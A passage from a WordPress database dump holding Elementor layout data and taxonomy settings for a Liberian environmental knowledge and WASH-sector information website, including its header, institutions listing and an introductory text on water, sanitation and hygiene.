\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(16115,2436,'_elementor_version','2.7.5'),(16116,2436,'_elementor_template_type','wp-post'),(16118,2437,'_wp_page_template','elementor_canvas'),(16119,2437,'_elementor_edit_mode','builder'),(16120,2437,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.48799999999999954525264911353588104248046875,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.7530000000000001136868377216160297393798828125,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.754999999999999005240169935859739780426025390625,\"css_classes\":\"hide-1024\",\"padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true},\"animation\":\"zoomIn\"},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up, It\'s Free\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(16121,2437,'_elementor_version','2.7.5'),(16122,2437,'_elementor_template_type','wp-post'),(16146,412,'built_in_post_types_project_resource','0'),(16147,412,'built_in_post_types_related_topic','0'),(16148,412,'built_in_post_types_mea_resource','0'),(16149,2446,'_elementor_controls_usage','a:0:{}'),(16150,2446,'_ca_post_type','document'),(16151,2447,'_elementor_controls_usage','a:0:{}'),(16152,2447,'_ca_taxonomy','resource_category'),(16153,2445,'_edit_last','1'),(16154,2445,'_elementor_controls_usage','a:0:{}'),(16155,2445,'_ca_handle','0'),(16156,2445,'_ca_host','sidebar'),(16157,2445,'_ca_merge_pos','0'),(16158,2445,'_edit_lock','1573903542:1'),(16165,2451,'_elementor_controls_usage','a:0:{}'),(16167,2451,'_ca_post_type','89'),(16176,2450,'_edit_last','1'),(16177,2450,'_elementor_controls_usage','a:0:{}'),(16178,2450,'_ca_handle','0'),(16179,2450,'_ca_host','sidebar'),(16180,2450,'_ca_merge_pos','1'),(16181,2450,'_edit_lock','1574077372:1'),(16184,2453,'_elementor_controls_usage','a:0:{}'),(16185,2453,'label_singular','Institutions Category'),(16186,2453,'public','1'),(16187,2453,'show_ui','1'),(16188,2453,'hierarchical','1'),(16189,2453,'type','taxonomy'),(16190,2453,'storage','meta'),(16191,2453,'old_name','institutions_category'),(16192,2453,'rewrite','1'),(16193,2453,'rewrite_with_front','1'),(16194,2453,'rewrite_hierarchical','1'),(16195,2453,'capability_type','default'),(16196,2453,'capability_type_custom','institutions_category'),(16197,2453,'query_var','0'),(16198,2453,'sort','0'),(16199,2453,'built_in_post_types_condition_group','0'),(16200,2453,'built_in_post_types_custom_css','0'),(16201,2453,'built_in_post_types_customize_changeset','0'),(16202,2453,'built_in_post_types_document','0'),(16203,2453,'built_in_post_types_elementor_library','0'),(16205,2453,'built_in_post_types_jet-smart-filters','0'),(16206,2453,'built_in_post_types_knowledge_broker','0'),(16207,2453,'built_in_post_types_mea_resource','0'),(16208,2453,'built_in_post_types_ocean_modal_window','0'),(16209,2453,'built_in_post_types_ocean_posts_slider','0'),(16210,2453,'built_in_post_types_oceanwp_library','0'),(16211,2453,'built_in_post_types_oembed_cache','0'),(16212,2453,'built_in_post_types_page','0'),(16213,2453,'built_in_post_types_post','0'),(16214,2453,'built_in_post_types_project_resource','0'),(16215,2453,'built_in_post_types_related_topic','0'),(16216,2453,'built_in_post_types_sidebar','0'),(16217,2453,'built_in_post_types_user_request','0'),(16218,2453,'built_in_post_types_usp_form','0'),(16219,2453,'built_in_post_types_wp_block','0'),(16220,2453,'built_in_post_types_attachment','0'),(16221,2453,'show_in_menu','1'),(16222,2453,'menu_location','default'),(16223,2453,'menu_position','0'),(16224,2453,'show_in_nav_menus','1'),(16225,2453,'show_tagcloud','1'),(16226,2453,'show_tagcloud_in_edit','1'),(16227,2453,'show_in_quick_edit','1'),(16228,2453,'show_admin_column','0'),(16229,2453,'pfat_enable','0'),(16230,2453,'pfat_run_outside_loop','0'),(16231,2453,'pfat_append_archive','append'),(16232,2453,'rest_enable','0'),(16233,2453,'read_all','0'),(16234,2453,'write_all','0'),(16235,419,'built_in_taxonomies_institutions_category','0'),(16236,714,'built_in_taxonomies_institutions_category','1'),(16237,2388,'built_in_taxonomies_institutions_category','0'),(16238,538,'built_in_taxonomies_institutions_category','0'),(16239,449,'built_in_taxonomies_institutions_category','0'),(16240,418,'built_in_taxonomies_institutions_category','0'),(16241,2453,'built_in_post_types_institution','1'),(16242,465,'built_in_post_types_institution','0'),(16250,2455,'_elementor_edit_mode','builder'),(16251,2455,'_elementor_template_type','wp-page'),(16252,2455,'_elementor_version','2.7.5'),(16253,2455,'_wp_page_template','default'),(16254,2455,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"institution\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"institutions_category\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"show_terms\":\"yes\",\"slides_to_scroll\":\"4\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"terms_link_typography_font_weight\":\"400\",\"terms_link_bg_color\":\"rgba(110,193,228,0.72)\",\"terms_link_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(16256,2456,'_elementor_edit_mode','builder'),(16257,2456,'_elementor_template_type','wp-page'),(16258,2456,'_elementor_version','2.7.5'),(16259,2456,'_wp_page_template','default'),(16260,2456,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"institution\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"institutions_category\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"show_terms\":\"yes\",\"slides_to_scroll\":\"4\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"terms_link_typography_font_weight\":\"400\",\"terms_link_bg_color\":\"rgba(110,193,228,0.72)\",\"terms_link_color\":\"#000000\",\"terms_link_hover_bg_color\":\"#006400\",\"terms_link_hover_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(16262,2457,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(16263,2457,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(16264,2457,'slide_template','default'),(16265,2457,'slide_template','default'),(16268,2457,'_elementor_template_type','wp-post'),(16269,2457,'_elementor_template_type','wp-post'),(16270,2457,'_elementor_version','2.7.5'),(16271,2457,'_elementor_version','2.7.5'),(16272,2457,'_wp_page_template','default'),(16273,2457,'_wp_page_template','default'),(16274,2457,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Water, sanitation and hygiene not only improve the quality of life but also bring tangible health, environmental and economic benefits and contribute to poverty reduction. With the current poor access to water, sanitation and good hygiene practices in Liberia, it should be noted that Liberia is losing a notable proportion of its GDP and not financing WASH will contribute to preventing Liberia from reaching its vision of becoming a middle income country by 2030.<\\/p><p>The Government of Liberia (GoL) has taken the initiative to accelerate the delivery of water, sanitation and hygiene (WASH) services in the country. A coordinated, comprehensive, and well-targeted investment programme to increase safe water coverage and reduce diseases is being implemented. This website brings together all information on the Liberia WASH Sector \\u2014 stakeholders, events, project information, water point mapping data, and much more. The site is managed by the National Water Sanitation and Hygiene Promotion Committee (NWSHPC).<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c15c0a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"67bf510\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f23c00\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"06ca2c7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"wash\\\",\\\"tag_id\\\":\\\"166\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"wash\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, 